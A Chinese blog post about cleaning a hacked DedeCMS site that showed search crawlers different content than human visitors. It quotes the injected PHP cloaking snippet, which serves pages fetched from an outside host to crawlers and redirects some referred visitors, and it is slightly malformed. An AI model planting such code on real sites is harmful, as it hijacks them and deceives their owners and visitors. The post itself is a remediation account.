解决网站快照与网站实际内容不符

2021-12-19    分类: 网站建设

前天 QQ上收到一个朋友发来的消息,问我在吗,我一看是创业园时候的朋友,就聊了起来,他所在的公司的客户的网站被入侵了

但是他和我说 他的那个客户的网站不是这类的,和这个一点关系都没有,我打开了域名看到的实际内容是

是一个商业网站,这时候我的思路很清晰了,首先可以确定的是人和蜘蛛看到的内容不一样,这也是常用黑帽手法,这样可以获取大量的外链,为了进一步确认的我思路,我决定用蜘蛛模拟器试试结果如下图:

果然和我想的是一样的,这就证明了我的猜想,这种一般就是在网站根目录添加一个畸形文件,让这个畸形文件无法删除

并且优先级要高于网站本身的权限,或者是在网站的默认文件档里面加上一段代码,来调用他的文件,来判断来的人还是蜘蛛

如果是蜘蛛就给它显示博采的内容,如果是人就显示正常的页面,在了FTP帐号密码 进行一步检查,

发现用的是我的第二种手法, 在文件内加入了以下PHP代码

$file="http://www.aoxsys.net/seo/3.html";

$referer=$_SERVER["HTTP_REFERER"];

$agent= strtolower($_SERVER["HTTP_USER_aGENT"]);

if(strstr($referer,"baidu")&&strstr($referer,"456"))

{

Header("Location: $url");

}

if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))

{

$content=file_get_contents($file);

echo $content;

exit;

}

>

< php

这个代码明白的一看就知道了吧,我就不解释了,在根目录还发现一个加密的文件,那个文件貌似是博采的网页内容,命名为index.asp.asp 接下来就是替换INDEX.PHP文件 然后删除相关后门,打上补丁,

但是当我拿到网站后台的帐号密码的时候我崩溃了,密码竟然 是默认的,帐号也是默认的,程序是DEDE 存在安全漏洞

修补漏洞 用DEDE的安全检测工具稍微检查了一下木马和WEBSHELL 没有多余发现,打上补丁收工,再用蜘蛛模拟器查看

网站内容和蜘蛛的爬行内容一致了 接下来就是@蜘蛛了 让蜘蛛过来爬 收录并更新快照 什么怎么@蜘蛛吗 这你都不会吗

那我也不会 嘿嘿!

注:更多请关注建站教程栏目

分享名称:解决网站快照与网站实际内容不符
网站链接:https://www.cdcxhl.com/news/141052.html

成都网站建设公司_创新互联,为您提供网站收录品牌网站建设企业网站制作网站导航网站制作做网站

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

成都网站建设公司